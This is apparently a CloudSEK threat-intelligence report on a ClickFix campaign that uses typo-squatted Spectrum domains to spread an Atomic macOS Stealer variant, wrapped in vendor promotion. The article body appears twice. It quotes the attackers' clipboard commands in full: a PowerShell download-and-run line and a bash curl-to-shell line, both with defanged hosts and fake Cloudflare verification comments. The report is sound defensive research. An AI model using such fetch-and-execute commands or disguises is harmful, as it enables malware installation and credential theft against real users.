🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.
Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.
Schedule a DemoA new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.
During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.
When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.
However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.
Clipboard - Non macOS useragent
powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
This is one of the most commonly used delivery methods for Windows users.
Clipboard - macOS useragent
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.
/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.
curl -fsSL <URL>:
The output of curl (i.e., the install.sh script) is executed immediately by Bash.
Contents of install.sh
Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.
Following CloudSEK's disclosure of their tactics and network, the hackers shifted to a new distribution method: malicious advertisements for counterfeit GitHub repositories aimed at Homebrew-using developers.(h/t Jérôme Segura - Malwarebytes)
The observed attack sequence mirrors the previously investigated case, involving a deceptive script ("install[.]sh") that fetches an "update" payload, which is a variant of AMOS. The infection process unfolds as follows:
On 6th June 2025, the threat actor created the fake “Homebrew” repository.
These commits were simply being made to replace old command and control servers with the new ones.
As we can see above, the threat actor removed their existing C2 and added the legitimate Homebrew installation (raw github) path, likely to establish authenticity for malvertising.
Later, the legitimate URL was replaced by attacker controlled C2s. All the IOCs from the repository have been added to the table at the end of this report.
While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.
The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
7
min read
CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.
A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.
During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.
When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.
However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.
Clipboard - Non macOS useragent
powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
This is one of the most commonly used delivery methods for Windows users.
Clipboard - macOS useragent
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.
/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.
curl -fsSL <URL>:
The output of curl (i.e., the install.sh script) is executed immediately by Bash.
Contents of install.sh
Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.
Following CloudSEK's disclosure of their tactics and network, the hackers shifted to a new distribution method: malicious advertisements for counterfeit GitHub repositories aimed at Homebrew-using developers.(h/t Jérôme Segura - Malwarebytes)
The observed attack sequence mirrors the previously investigated case, involving a deceptive script ("install[.]sh") that fetches an "update" payload, which is a variant of AMOS. The infection process unfolds as follows:
On 6th June 2025, the threat actor created the fake “Homebrew” repository.
These commits were simply being made to replace old command and control servers with the new ones.
As we can see above, the threat actor removed their existing C2 and added the legitimate Homebrew installation (raw github) path, likely to establish authenticity for malvertising.
Later, the legitimate URL was replaced by attacker controlled C2s. All the IOCs from the repository have been added to the table at the end of this report.
While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.
The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.